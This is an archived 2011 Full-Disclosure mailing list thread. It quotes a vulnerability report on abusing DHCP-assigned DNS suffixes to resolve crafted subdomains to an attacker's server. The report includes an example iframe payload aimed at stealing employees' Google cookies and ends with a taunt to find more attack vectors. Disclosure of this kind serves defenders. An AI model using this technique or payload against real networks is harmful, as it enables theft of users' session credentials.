[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20110513113450.GB2720@DataIX.net>
Date: Fri, 13 May 2011 07:34:50 -0400
From: Jason Hellenthal <jhell@...aIX.net>
To: yu xi4o <evil.xi4oyu@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Dns-suffix may lead to cross-domain and other
security problems
yu,
Are you related to MustntLive ?
On Fri, May 13, 2011 at 12:07:37PM +0800, yu xi4o wrote:
> We all know that dhcpd can set the dns suffix for its clients. For example ,
> If we set the dns suffix as "test.com". While doing the domain name
> resolution such as www.xxx.com , all the client using this dhcp server will
> try the following order.
>
> 1. System tries to look up www.xxx.com if the dns find a IP addr , the
> client will go on use this ip.
> 2. Otherwise , the system will automatically add the dns suffix to have
> another try(This is partly true cos win7 only add dns suffix to the dns
> name doesn't contain a '.' ). This time will be www.xxx.com.test.com .If
> the dns return the found addr, program will happily use this result as its
> right answer .This did bring some convenient, but may lead to some problem,
> for example cross-domain.
>
> Scenario ???
> 1.Company A.COM provide secondary domain registation for their customers (
> eg. free blog system) .People can register any username they want, from
> example test . Then his space will be test.A.com. This works fine.
>
> 2.Company's internal network using a dhcp server which automatically adds an
> A.COM dns suffix to their clients.
>
> An attack wanna gather some employees' gmail account. He then can easily
> register a username like hack.www.google.com then the full domain name will
> be hack.www.google.com.A.com
>
>
> When A.com 's employees browser the web site contains a iframe such as
> <iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe>
>
> Employees's system will
> 1. try to resolve hack.www.google.com then get a false answer(NX Domain).
> 2.then try hack.www.google.com.A.com will get attacker's host IP addr.!!!
>
> But the browser doesn't know this & will happily send google's cookies to
> the attacker's web server.
>
> Success on windows XP /Linux Ubuntu 11.04 IE FF Chrome~:) Failed on win7
> cos its only add dns suffix to the dnsname doesn't contain a '.'
>
> GAME OVER!!!
>
> Use your brains and think more potential attack vectors!!
>
> Find more vuls at http://www.wooyun.org/bugs/wooyun-2010-02113
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
Regards, (jhell)
Jason Hellenthal
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists